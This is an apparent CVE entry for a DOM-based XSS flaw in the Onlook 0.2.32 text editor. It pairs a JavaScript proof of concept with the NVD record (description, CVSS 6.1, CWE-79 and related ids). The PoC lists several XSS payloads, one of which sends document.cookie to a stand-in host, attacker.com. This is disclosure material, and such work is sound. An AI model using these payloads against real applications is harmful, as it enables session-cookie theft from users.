CVE-2025-63785

// CVE-2025-63785 PoC - DOM XSS in Onlook Text Editor // This PoC demonstrates the DOM-based XSS vulnerability in Onlook 0.2.32 // Malicious payload to be entered in the text editor const maliciousPayload = `<img src=x onerror="alert(document.cookie)">`; // Alternative payloads that could be used: // 1. <script>alert(document.domain)</script> // 2. <svg onload=alert('XSS')> // 3. <iframe src="javascript:alert(document.cookie)"> // 4. <body onload=alert(document.cookie)> // Attack scenario: // 1. Attacker creates or edits a text element in Onlook // 2. Attacker injects the malicious payload into the text content // 3. When victim previews or views the content, the script executes // Example of exploitation via text editor: function exploitOnlookDOMXSS() { // Simulating text editor input injection const userInput = '<img src=x onerror="fetch(\"https://attacker.com/steal?c=\"+document.cookie)\"> '; // Vulnerable code pattern (what Onlook might be doing internally) // element.innerHTML = userInput; // No sanitization! console.log('Malicious payload injected:', userInput); return 'XSS payload ready for injection'; } exploitOnlookDOMXSS();

{"cve": {"id": "CVE-2025-63785", "sourceIdentifier": "[email protected]", "published": "2025-11-07T17:15:47.887", "lastModified": "2025-12-08T16:06:30.767", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A DOM-based Cross-Site Scripting (XSS) vulnerability exists in the text editor feature of the Onlook web application 0.2.32. This vulnerability occurs because user-supplied input is not properly sanitized before being directly injected into the DOM via innerHTML when editing a text element. An attacker can exploit this to inject malicious HTML and script code, which is then executed within the context of the preview iframe, allowing for the execution of arbitrary scripts in the user's session."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-116"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:onlook:onlook:0.2.32:*:*:*:*:*:*:*", "matchCriteriaId": "6A720EDB-10C0-47F4-BCF5-138FB5124DFA"}]}]}], "references": [{"url": "https://blog.soohyun.tech/CVE-2025-63785-DOM-XSS-in-Onlook-27e557175d2e80e1b210c75b77952115", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://tossbank.notion.site/DOM-XSS-in-onlook-27e557175d2e80e1b210c75b77952115", "source": "[email protected]", "tags": ["Broken Link"]}]}}